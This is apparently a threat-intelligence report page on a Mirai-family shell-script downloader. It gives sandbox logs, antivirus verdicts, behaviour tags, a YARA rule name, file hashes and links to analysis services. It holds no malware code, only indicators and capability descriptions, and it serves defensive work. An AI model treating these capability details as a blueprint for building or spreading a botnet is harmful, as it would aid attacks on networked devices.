guuid=7580a14b-1f00-0000-cfa6-26db8b120000 pid=4747->56d2c9c1-1a90-5e50-a3f5-d00590bd5ef1 send: 103B guuid=d1d0f452-1f00-0000-cfa6-26dba8120000 pid=4776->56d2c9c1-1a90-5e50-a3f5-d00590bd5ef1 send: 154B guuid=cea8fd5a-1f00-0000-cfa6-26dbc2120000 pid=4802->56d2c9c1-1a90-5e50-a3f5-d00590bd5ef1 send: 103B guuid=a55f9d63-1f00-0000-cfa6-26dbdd120000 pid=4829->56d2c9c1-1a90-5e50-a3f5-d00590bd5ef1 send: 155B guuid=e3170e69-1f00-0000-cfa6-26dbef120000 pid=4847->56d2c9c1-1a90-5e50-a3f5-d00590bd5ef1 send: 104B guuid=e2d79a71-1f00-0000-cfa6-26db14130000 pid=4884->56d2c9c1-1a90-5e50-a3f5-d00590bd5ef1 send: 154B guuid=cdafd276-1f00-0000-cfa6-26db28130000 pid=4904->56d2c9c1-1a90-5e50-a3f5-d00590bd5ef1 send: 103B
Score:
100%
Verdict:
Malware
File Type:
SCRIPT
Link:
https://malprob.io/report/2e0bd5206319d496d982b1cd36c8e181bc99986156fc529d24e47eb913d6ed18
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/2e0bd5206319d496d982b1cd36c8e181bc99986156fc529d24e47eb913d6ed18/
Threat name:
Linux.Downloader.Medusa
Create hunting rule
Status:
Malicious
First seen:
2025-06-24 10:04:23 UTC
File Type:
Text (Shell)
AV detection:
16 of 24 (66.67%)
Threat level:
  3/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=fyf5kidddhkjnwmcwhgtnshbqg6jtgdbk36ffhje4r7lse6w5uma._file
Result
Malware family:
mirai
Create hunting rule
Score:
  10/10
Tags:
family:mirai antivm botnet defense_evasion discovery linux upx
Link:
https://tria.ge/reports/250624-l35sfazpx8/
Behaviour
Reads runtime system information
System Network Configuration Discovery
Writes file to tmp directory
Checks CPU configuration
UPX packed file
Enumerates running processes
Writes file to system bin folder
File and Directory Permissions Modification
Executes dropped EXE
Modifies Watchdog functionality
Mirai
Mirai family
Malware family:
Mirai
Create hunting rule
Verdict:
Malicious
Link:
https://www.vmray.com/analyses/_mb/2e0bd5206319/report/overview.html
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Suspicious File
Score:
0.39
Link:
https://yomi.yoroi.company/submissions/2e0bd5206319d496d982b1cd36c8e181bc99986156fc529d24e47eb913d6ed18

YARA Signatures

MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:Linux_Shellscript_Downloader
Create hunting rule
Author:albertzsigovits
Description:Generic Approach to Shellscript downloaders

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Web download

Mirai

sh 2e0bd5206319d496d982b1cd36c8e181bc99986156fc529d24e47eb913d6ed18

(this sample)

Mirai

elf d9acd21327635b9026893caa039e2f037915c0d1b2fcb50154935a2f83ffb16a

Mirai

elf bb35b3bcd6e2168381f3e1f5c8a96d02ed580241524bc5f32baefa6e33b45a0a

  
URLhaus
https://urlhaus.abuse.ch/url/3569420/
  
Delivery method
Distributed via web download
  
Dropping
MD5 bdfbaeb2c67273f61f51b5bfa69f8815
  
Dropping
SHA256 bb35b3bcd6e2168381f3e1f5c8a96d02ed580241524bc5f32baefa6e33b45a0a

Comments